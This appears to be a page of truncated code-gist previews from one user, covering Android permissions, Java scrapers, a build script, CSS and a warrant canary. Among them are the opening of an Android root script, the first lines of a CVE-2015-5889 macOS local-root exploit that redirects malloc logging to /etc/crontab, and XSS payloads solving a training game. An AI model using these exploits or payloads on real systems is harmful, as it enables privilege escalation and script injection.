This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
android.permission.ACCESS_ALL_DOWNLOADS | |
android.permission.ACCESS_BLUETOOTH_SHARE | |
android.permission.ACCESS_CACHE_FILESYSTEM | |
android.permission.ACCESS_CHECKIN_PROPERTIES | |
android.permission.ACCESS_CONTENT_PROVIDERS_EXTERNALLY | |
android.permission.ACCESS_DOWNLOAD_MANAGER | |
android.permission.ACCESS_DOWNLOAD_MANAGER_ADVANCED | |
android.permission.ACCESS_DRM_CERTIFICATES | |
android.permission.ACCESS_EPHEMERAL_APPS | |
android.permission.ACCESS_FM_RADIO |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Give the usual warning. | |
clear; | |
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds..."; | |
sleep 10; | |
clear; | |
# Download and extract exploit files. | |
echo "[INFO] Downloading exploit files from GitHub..."; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root | |
import os,time,sys | |
env = {} | |
s = os.stat("/etc/sudoers").st_size | |
env['MallocLogFile'] = '/etc/crontab' | |
env['MallocStackLogging'] = 'yes' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.io.BufferedReader; | |
import java.io.InputStreamReader; | |
import java.net.URL; | |
import java.net.URLConnection; | |
import java.util.ArrayList; | |
import java.util.List; | |
import java.util.regex.Pattern; | |
public class Main { | |
public static void main(String[] args) throws Exception { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
==QPJJjYxJ0UapGbtJmCNUEb4JXdY9Cbn5ybvd2LvoDc0RHa |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.util.*; | |
import java.util.regex.Pattern; | |
import java.net.*; | |
import java.io.*; | |
public class ChaosWebs { | |
public static double time = 6 * 60 * 60 * 1000; | |
public static String filename = ".last_post.txt"; | |
public static void main(String[] args) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
These are my solutions to http://xss-game.appspot.com/. I did not use any hints on these, but I took a while on the last two. | |
[Level 1]: Search for the string. | |
<script>alert(1)</script> | |
[Level 2]: Post the string | |
<img src=x onerror=javascript:alert(1)></img> | |
[Level 3]: Navigate to the URL | |
http://xss-game.appspot.com/level3/frame#1' onerror="javascript:alert(1)" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
wget https://www.python.org/ftp/python/3.4.2/Python-3.4.2.tgz | |
tar xvf Python-3.4.2.tgz | |
cd Python-3.4.2 | |
./configure | |
make | |
make test | |
sudo make install | |
cd .. | |
rm -rf Python-3.4.2 | |
rm Python-3.4.2.tgz |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
public key -> http://arinerron.com/key.asc | |
fingerprint -> FA6E 4332 B944 9910 | |
-----BEGIN PGP SIGNED MESSAGE----- | |
Hash: SHA1 | |
The reason why I have not updated the warrant canary for the website arinerron.com is because the website is down for maintenance. There is nothing to be worried about. To my knowlege, neither the site has been hacked, nor have I received a NSL. | |
I will update the canary as soon as the site is off maintenance mode. Thanks. | |
-----BEGIN PGP SIGNATURE----- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
html { | |
font-family: monospace; | |
} | |
#postListArea { | |
border-color: #006b19; | |
border-width: 4px; | |
border-style: double; | |
} |